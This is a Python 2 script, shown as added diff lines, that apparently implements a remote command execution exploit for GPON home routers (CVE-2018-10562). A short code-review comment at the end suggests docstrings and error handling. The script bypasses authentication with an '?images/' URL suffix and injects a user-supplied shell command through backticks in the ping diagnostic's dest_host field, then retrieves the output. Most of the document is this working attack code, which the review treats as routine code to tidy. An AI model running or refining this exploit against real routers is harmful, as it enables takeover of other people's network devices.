1+ #!/usr/bin/env python
2+
3+ import sys
4+ import requests
5+ import time
6+ import urllib2
7+ import re
8+ import ssl
9+
10+ ctx = ssl .create_default_context ()
11+ ctx .check_hostname = False
12+ ctx .verify_mode = ssl .CERT_NONE
13+
14+
15+ def banner ():
16+ ascii_art = """
17+
18+ ________________________________________________________________
19+
20+ [*] GPON Remote Code Execution (CVE-2018-10562) [*]
21+ ________________________________________________________________
22+
23+ Coded by F3D
24+ Twitter: @f3d_0x0
25+ Medium: medium.com/@0xf3d
26+ ________________________________________________________________
27+
28+ """
29+ print ascii_art
30+
31+ def retrieve_results (target , command ):
32+ try :
33+ fp = urllib2 .urlopen (target + '/diag.html?images/' , context = ctx )
34+ for line in fp .readlines ():
35+ if 'diag_result = \" Can\' t resolv hostname for' in line :
36+ start = '['
37+ end = ';' + command + ']'
38+ res = str (line [line .find (start )+ len (start ):line .rfind (end )])
39+ return res .replace ('\\ n' , '\n ' )
40+ except Exception as e :
41+ print "[DEBUG] " + str (e ) + '\n '
42+ print "[*] An error occured while retriving the result"
43+
44+ def send_command (url_bypass , payload ):
45+ print "[*] Injecting command.."
46+ try :
47+ req = requests .Request ('POST' , url_bypass , data = payload )
48+ prepared = req .prepare ()
49+ s = requests .Session ()
50+ s .send (prepared )
51+ except Exception as e :
52+ pass
53+
54+
55+ if __name__ == "__main__" :
56+ try :
57+
58+ banner ()
59+
60+ domain = sys .argv [1 ]
61+ command = sys .argv [2 ]
62+
63+ url_bypass = domain + '/GponForm/diag_Form?images/'
64+ payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
65+ send_command (url_bypass , payload )
66+ print "[*] Waiting for results..zZz.."
67+ time .sleep (3 )
68+ print "[*] Getting the results.."
69+ out = retrieve_results (domain , command )
70+ print ""
71+ print out
72+ print ""
73+
74+ except Exception as e :
75+ print "[DEBUG] " + str (e ) + '\n '
76+ print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
77+ print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \' id\' \n "
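Review bot: The file has no header comment describing what its two requests look like on the wire, which is what someone triaging router logs or writing a detection needs. From lines 63-64 and 33 that is a POST to `/GponForm/diag_Form?images/` whose `dest_host` field carries backticks and a `;`, followed by a GET of `/diag.html?images/`. A module docstring stating those request shapes, the CVE named in the banner, and that the script is Python 2 only (`urllib2`, `print` statements) would cover it. Separately, `send_command` ends in `except Exception as e: pass`, so a failed request looks the same as a delivered one and `retrieve_results` then returns `None`, which line 71 prints; printing `"[DEBUG] " + str(e)` there, as `retrieve_results` already does, keeps the cause visible. The `ctx` set up at lines 10-12 turns off hostname and certificate checks for the `urllib2` fetch only, while the `requests` POST keeps its defaults, so a comment at `ctx.verify_mode = ssl.CERT_NONE` should say whether that difference is intended.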